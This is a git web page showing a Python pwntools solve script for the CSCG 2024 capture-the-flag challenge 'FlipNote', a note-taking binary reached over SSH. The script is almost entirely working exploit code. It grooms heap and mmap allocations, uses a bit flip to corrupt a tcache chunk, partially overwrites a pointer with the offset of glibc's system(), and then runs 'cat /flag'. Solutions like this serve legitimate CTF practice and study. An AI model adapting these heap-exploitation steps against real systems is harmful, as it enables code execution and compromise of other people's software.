cscg24-flipnote

CSCG 2024 Challenge 'FlipNote'
git clone https://git.sinitax.com/sinitax/cscg24-flipnote
Log | Files | Refs | sfeed.txt

solve (4963B)


      1#!/usr/bin/env python3
      2
      3from pwn import *
      4from math import floor, ceil
      5from IPython import embed
      6import ctypes
      7
      8args = sys.argv[1:]
      9if len(args) == 0:
     10    args = ["ssh", "-p", "1024", "root@localhost"]
     11    if pwnlib.args.args.GDB:
     12        args.append("pkill gdbserver; gdbserver localhost:1025 /vuln")
     13    else:
     14        args.append("/vuln")
     15
     16cci = 0
     17def cc():
     18    global cci
     19    cci += 1
     20    return string.ascii_uppercase[cci].encode()
     21
     22def alloc(line):
     23    assert(b"\n" not in line)
     24    io.sendline(b"a")
     25    io.readuntil(b"Note: ")
     26    io.sendline(line)
     27    line = io.readline().decode().strip()
     28    print(line)
     29    return int(line.split()[-1])
     30
     31def free(index):
     32    io.sendline(b"r")
     33    io.readuntil(b"Index: ")
     34    io.sendline(str(index).encode())
     35    print(f"Removed note: {index}")
     36
     37def edit(index, line):
     38    assert(b"\n" not in line)
     39    io.sendline(b"e")
     40    io.readuntil(b"Index: ")
     41    io.sendline(str(index).encode())
     42    io.readuntil(b"Note: ")
     43    io.sendline(line)
     44    print(f"Edited note: {index}")
     45
     46def cfloor(a, b):
     47    return floor(a / b) if a >= 0 else ceil(a / b)
     48
     49def flip(index, offset, bit):
     50    adjusted = offset - 1 if offset < 0 and bit > 0 else offset
     51    assert(offset == cfloor(ctypes.c_int8(adjusted * 8 + bit).value, 8))
     52    io.sendline(b"f")
     53    io.sendline(str(index).encode())
     54    io.sendline(str(ctypes.c_uint8(adjusted * 8 + bit).value).encode())
     55    io.readuntil(b"Index: ")
     56    io.readuntil(b"Offset: ")
     57    print(io.readline().decode().strip())
     58
     59def flipv(index, offset, value):
     60    bit = (value & -value).bit_length() -1
     61    flip(index, offset + bit // 8, bit % 8)
     62
     63def alignup(a, b):
     64    return (a if a % b == 0 else (a - (a % b) + b))
     65
     66def heap_adj(size):
     67    sizes = (0x78 * 2 ** i for i in reversed(range(12)))
     68    inner = next(filter(lambda s: s < size, sizes))
     69    assert(alignup(inner + 8, 16) == size)
     70    return inner - 2
     71
     72def mmap_adj(size):
     73    return size - 2 - 0x1000
     74
     75mmap_threshold_max = 0x2000000
     76def mmap_adj_max(size):
     77    assert(size > mmap_threshold_max) # single bit
     78    mmap_sizes = (0x78 * 2 ** i - 2 for i in reversed(range(25)))
     79    return next(filter(lambda s: s > mmap_threshold_max and s < size, mmap_sizes))
     80
     81# get_delim will alloc in powers of 2 starting at 0x78
     82def heap_size(n):
     83    s = 0x78 * 2 ** n + 8
     84    return alignup(s, 16)
     85
     86def mmap_size(n):
     87    return 0x78 * 2 ** (11 + n) + pgsize
     88
     89def flat(attrs, length):
     90    data = bytearray(cc() * length)
     91    for addr,value in attrs.items():
     92        assert(addr >= 0 and addr + len(value) <= length)
     93        data[addr:addr+len(value)] = value
     94    data = bytes(data)
     95    assert(len(data) == length)
     96    return data
     97
     98pgsize = 0x1000
     99
    100def main():
    101    small_size = heap_size(0)
    102    tcache_size = heap_size(0)
    103
    104    io = process(args)
    105
    106    if pwnlib.args.args.GDB:
    107        gdb = 'gdb -ex "set debug-file-directory $PWD/debug" -ex "dir glibc" -ex "set debuginfod enabled on"' \
    108            + ' -ex "target remote localhost:1025" -ex "b main" -ex "continue" -ex "b exit"'
    109        run_in_new_terminal(["sh", "-c", f'sleep 1; sudo -E {gdb}'], kill_at_exit=False)
    110
    111    #a = alloc(cc() * heap_adj(0x280))
    112
    113    # tcache = [alloc(cc() * heap_adj(heap_size(0))) for _ in range(7)]
    114    # list(map(free, tcache))
    115    # 
    116    # a = alloc(cc() * heap_adj(heap_size(0)))
    117    # b = alloc(cc() * heap_adj(heap_size(0)))
    118
    119    print(hex(mmap_adj(mmap_size(0))))
    120    print(hex(mmap_adj(mmap_size(1))))
    121    print(hex(mmap_adj(mmap_size(2))))
    122    print(hex(mmap_adj(mmap_size(3))))
    123    print(hex(heap_adj(heap_size(0))))
    124
    125    embed()
    126
    127    b = alloc(cc() * heap_adj(small_size))
    128    c = alloc(cc() * heap_adj(tcache_size))
    129    d = alloc(cc() * heap_adj(tcache_size))
    130
    131    # allocate these backwards in size, because getdelim reallocs them malloc new, copy & free old
    132    spacing = [alloc(cc() * mmap_adj(mmap_size(3)))]
    133    spacing += [alloc(cc() * mmap_adj(mmap_size(3)))]
    134    spacing += [alloc(cc() * mmap_adj(mmap_size(2)))]
    135    spacing += [alloc(cc() * mmap_adj(mmap_size(1)))]
    136    spacing += [alloc(cc() * mmap_adj(mmap_size(0)))]
    137    spacing += [alloc(cc() * mmap_adj(mmap_size(0)))]
    138
    139    a = alloc(cc() * mmap_adj(mmap_size(0)))
    140    free(a)
    141
    142    free(b)
    143    assert(b == alloc(flat({
    144        mmap_size(2) - mmap_size(0) - 8: p64(tcache_size^0b001),
    145    }, mmap_adj(mmap_size(2)))))
    146
    147    free(a)
    148
    149    free(c)
    150
    151    flipv(c, 0, 0x800000)
    152
    153    c = alloc(cc() * heap_adj(tcache_size))
    154
    155    system_offset = int.to_bytes(0x050d70, 3, byteorder="little")
    156
    157    context.log_level = "DEBUG"
    158
    159    io.sendline(b"A" * 0x40)
    160    io.readuntil(b"Note: ")
    161    io.sendline(cc() * 0x19)
    162    io.readuntil(b"Added note: ")
    163    a = int(io.readline().decode().strip())
    164
    165    # readline keeps making size smaller so we adjust
    166    io.sendline(b"E" * 0x3e)
    167    io.sendline(str(a).ljust(0x3c).encode())
    168    io.readuntil(b"Note: ")
    169    io.sendline(cc() * 0x18 + system_offset)
    170
    171    io.sendline(b"cat /flag") # must be <= 0x11
    172    io.sendline(b"!"*0x81) # cause realloc
    173
    174    print(io.readall())